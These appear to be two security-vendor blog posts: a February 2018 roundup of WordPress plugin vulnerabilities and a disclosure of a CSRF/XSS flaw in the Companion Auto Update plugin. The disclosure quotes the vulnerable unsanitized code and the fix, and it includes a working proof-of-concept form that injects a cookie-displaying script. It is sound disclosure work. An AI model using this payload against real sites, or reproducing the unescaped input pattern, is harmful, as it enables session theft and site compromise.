02 Mar

What Happened With WordPress Plugin Vulnerabilities in February 2018

If you want the best information and therefore best protection against vulnerabilities in WordPress plugins we provide you that through our service.

Here is what we did to keep those are already using our service secure from WordPress plugin vulnerabilities during February (and what you have been missing out on if you haven’t signed up yet):

Plugin Vulnerabilities We Discovered and Publicly Disclosed This Month

We don’t just collect data on vulnerabilities in plugins that others have discovered, we also discover vulnerabilities through proactive monitoring of changes made to plugins, monitoring hackers’ activity, reviewing other vulnerabilities, and by doing additional checking on the security of plugins.

The most concerning vulnerabilities this month were several PHP object injection vulnerabilities. That is a type of vulnerability likely to be exploited. Two of them were in plugins with 10,000+ active installs according to wordpress.org. Another one, which may have been being exploited already when we ran across it, was in an even more popular plugin (with 300,000+ active installs), but it was only exploitable by those logged in to WordPress, which limited the threat. Our Plugin Security Checker (which is now accessible through a WordPress plugin of its own) can detect the possibility of those variants of PHP object injection, so anyone can check if plugins they use may be impacted by a similar vulnerability.

Plugin Vulnerabilities We Helped Get Fixed This Month

Letting you know that you are using a vulnerable version of plugin is useful, but it is much more useful if you can fully protect yourself by simple updating to a new version. So we work with plugin developers to make sure that vulnerabilities get fixed.

Plugin Vulnerabilities Added This Month That Are In The Current Version of the Plugins

Keeping your plugins up to date isn’t enough to keep you secure as these vulnerabilities in the current versions of plugins show:

Additional Vulnerabilities Added This Month

As usual, there were plenty of other vulnerabilities that we added to our data during the month. The most serious vulnerabilities here being two of the PHP object injection vulnerabilities we discovered during the month, with one of them possibly being exploited already.

01 Jun

Cross-Site Request Forgery (CSRF)/Cross-Site Scripting (XSS) Vulnerability in Companion Auto Update

We recently found that the plugin Companion Auto Update contained a cross-site request forgery (CSRF)/cross-site scripting (XSS) vulnerability with the plugin’s settings.

The CSRF portion is caused by a lack of a nonce being included with a request to change the plugin’s settings and a lack of check that valid one is included when doing the saving.

For the XSS portion, when the setting were saved the “Email address” input was not sanitized (in the file /companion-auto-update.php):

179
$email 			= $_POST['cau_email'];
187
$wpdb-<query( " UPDATE $table_name SET onoroff = '$email' WHERE name = 'email' " );

When it was output on the settings page it wasn’t escaped either:

245
246
if( $cau_configs[4]->onoroff == '' ) $toemail = get_option('admin_email'); 
else $toemail = $cau_configs[4]->onoroff;
<input type="text" name="cau_email" id="cau_email" class="regular-text" placeholder="<?php echo get_option('admin_email'); ?>" value="<?php echo $toemail; ?>" />

After we notified the developer the released version 2.9.4, which fixes the XSS portion by sanitizing the input using sanitize_email():

181
$email          = sanitize_email( $_POST['cau_email'] );

The CSRF portion still exists at this time.

Update 2/15/2018: Version 3.0.2 of the plugin has resolved the CSRF portion of the vulnerability.

Proof of Concept

The following proof of concept will cause an alert box with any accessible cookies to be shown on the page /wp-admin/tools.php?page=cau-settings, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=cau-settings" method="POST">
<input type="hidden" name="cau_email" value='"</textarea><script>alert(document.cookie);</script>'>
<input type="submit" name="submit" value="Save Changes" />
</form>
</body>
</html>

Timeline

  • May 30, 2017 – Developer notified.
  • May 31, 2017 – Version 2.9.4 released, which fixes CSRF/XSS vulnerability. CSRF portion still exists.
  • February 10, 2018 – Version 3.0.2 released, which fixes CSRF portion of vulnerability.